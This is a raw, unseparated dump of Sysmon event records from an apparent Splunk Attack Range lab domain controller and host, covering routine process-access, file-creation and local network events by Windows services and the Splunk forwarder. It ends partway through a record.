10:49:02.207{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.207{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.207{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.207{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-111E-6216-FF04-000000003802}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.207{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-111E-6216-FF04-000000003802}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.209{C8EA50B7-111E-6216-FF04-000000003802}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.097{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=136B38FC7B47A249896754130834C922,SHA256=A8BF85A58951110F77EA5B9FA687AC7445FD2CCA5BC4CF3FDA81C53382B0DDFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.004{C8EA50B7-111D-6216-FE04-000000003802}51762300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:03.613{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4AE8929B4FD067C52AA303C857329FD,SHA256=EF25969504726C67CB705EC08A90A41FDE86F6905A82C2B4B1F54E04B271B106,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:00.711{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53416-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:03.129{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BA53382C52B5CD051FBAC8EA2D44833,SHA256=3D8F26F12316FD8DCA4E778D05A498C2D20266E6B3AEA96EC258BF9091572770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:04.628{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911A8663C2BDEC8C1D5B0599DF59D87D,SHA256=868235E99047DD1FD26F046559FEC90FE23736C4DB3CC92F9591FC8A1CAB2B12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.207{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7755C16484594CB791301FF1574897B,SHA256=E494553D9CBEB83253E2D1811ECD5428C33D5CB2295F15EC212EA31CD7EC3E62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.144{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1120-6216-0005-000000003802}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.144{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.144{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.144{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.144{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.144{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1120-6216-0005-000000003802}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.144{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1120-6216-0005-000000003802}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.145{C8EA50B7-1120-6216-0005-000000003802}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:05.628{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC4A98520412076112D106876A035605,SHA256=C12AC726CD888AC0D7F0ACBB2DBCD3E0E2E49A436E30D5B02A4E716BF9AF8E73,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.258{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53418-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000287436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:04.258{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53418-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000287435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:03.180{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53417-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:03.180{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53417-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 10341000x8000000000000000287433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 